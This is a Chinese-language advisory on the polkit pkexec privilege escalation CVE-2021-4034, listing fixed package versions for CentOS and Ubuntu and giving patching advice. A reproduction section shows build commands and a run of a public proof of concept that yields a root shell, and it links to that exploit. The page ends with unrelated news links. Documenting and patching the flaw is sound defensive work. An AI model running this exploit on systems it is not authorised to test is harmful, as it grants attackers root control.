漏洞描述Polkit是用于在Linux操作系统中控制系统范围特权的组件 。 它为非特权进程提供了与特权进程进行通信的有组织的方式 。 类似“sudo”的用法 。
CVE-2021-4034
polkit的pkexec存在本地权限提升漏洞 , 已获得普通权限的攻击者可通过此漏洞获取root权限 。
该漏洞CVSS评分:7.8 ,
危害等级:高危漏洞利用难度低 , 最早引入问题的commit来自2009年 , 影响版本范围远超去年的sudo漏洞 。 漏洞作者在Ubuntu、Debian、Fedora和CentOS的默认安装环境上均测试通过 。
影响范围影响版本:由于polkit为系统预装工具 , 目前主流Linux版本均受影响 。
修复版本:
CentOS系列:
CentOS 6:polkit-0.96-11.el6_10.2
CentOS 7:polkit-0.112-26.el7_9.1
CentOS 8.0:polkit-0.115-13.el8_5.1
CentOS 8.2:polkit-0.115-11.el8_2.2
CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu系列:
Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1
Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
漏洞复现下载poc , 进入poc目录 , 编译 , 运行 。
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo \"module UTF-8// PWNKIT// pwnkit 1\" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
poc地址https://github.com/berdav/CVE-2021-4034
修复建议参考漏洞影响范围 , 及时升级至最新安全版本 。
总结和参考1、及时安装安全软件 , 关闭不需要的服务和端口 。
2、开启系统防火墙 。
【Ubuntu|Linux Polkit本地权限提升漏洞(CVE-2021-4034)】3、及时升级系统或者软件的版本 。
- Linux|安卓系统卡,是国产APP造成的?
- Linux|冰箱什么牌子好?2022年冰箱销量排行榜前5名
- Linux|雷军“米家杂货铺”性价比神器,每款低于行业价,网友:特给力
- ps4|给PS4装上Linux,然后用Xbox手柄打任天堂游戏?网友:这场面没见过
- linux|摩尔线程加入OpenCloudOS操作系统社区
- Linux|i5 4590为什么二手的比E3 1230v3贵了?
- C语言|无法在循环中声明变量,固执的Linux之父终于决定升级C语言版本
- Linux|二手iPhone 8 Plus和国产千元机,你们会怎么选择?
- vr|花17000元在元宇宙里用Linux?这款VR电脑开启预售,头显就是主机
- Linux|从2699元跌至1979元,256GB+66W闪充,高配旗舰已掉至千元档